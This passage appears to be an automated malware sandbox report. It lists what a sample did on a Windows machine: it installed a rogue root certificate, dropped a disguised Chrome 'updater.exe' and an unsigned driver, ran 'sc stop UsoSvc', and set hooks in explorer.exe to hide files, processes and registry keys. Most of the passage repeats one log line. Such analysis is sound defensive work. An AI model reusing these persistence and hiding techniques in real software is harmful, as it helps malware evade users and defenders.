          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6BC6DD push rcx; retf 003Fh30_2_00000225DC6BC6DE
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0ACACDD push rcx; retf 003Fh36_2_00000202C0ACACDE
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AFC6DD push rcx; retf 003Fh36_2_00000202C0AFC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A6612EACDD push rcx; retf 003Fh39_2_000002A6612EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66131C6DD push rcx; retf 003Fh39_2_000002A66131C6DE
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAED9ACDD push rcx; retf 003Fh40_2_000002BAAED9ACDE
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDCC6DD push rcx; retf 003Fh40_2_000002BAAEDCC6DE
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_0000000140001394 push qword ptr [0000000140009004h]; ret 63_2_0000000140001403
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879AACDD push rcx; retf 003Fh65_2_0000026A879AACDE
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001795378ACDD push rcx; retf 003Fh66_2_000001795378ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537BC6DD push rcx; retf 003Fh66_2_00000179537BC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D54ACDD push rcx; retf 003Fh67_2_000002295D54ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D57C6DD push rcx; retf 003Fh67_2_000002295D57C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_00000253067EACDD push rcx; retf 003Fh68_2_00000253067EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E7C6DD push rcx; retf 003Fh68_2_0000025306E7C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3BC6DD push rcx; retf 003Fh69_2_000001845B3BC6DE

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\jxhirqfmeznn.sysJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\jxhirqfmeznn.sysJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\jxhirqfmeznn.sysJump to dropped file
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hooks files or directories query functions (used to hide files and directories)
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Hooks processes query functions (used to hide processes)
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Hooks registry keys query functions (used to hide registry keys)
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
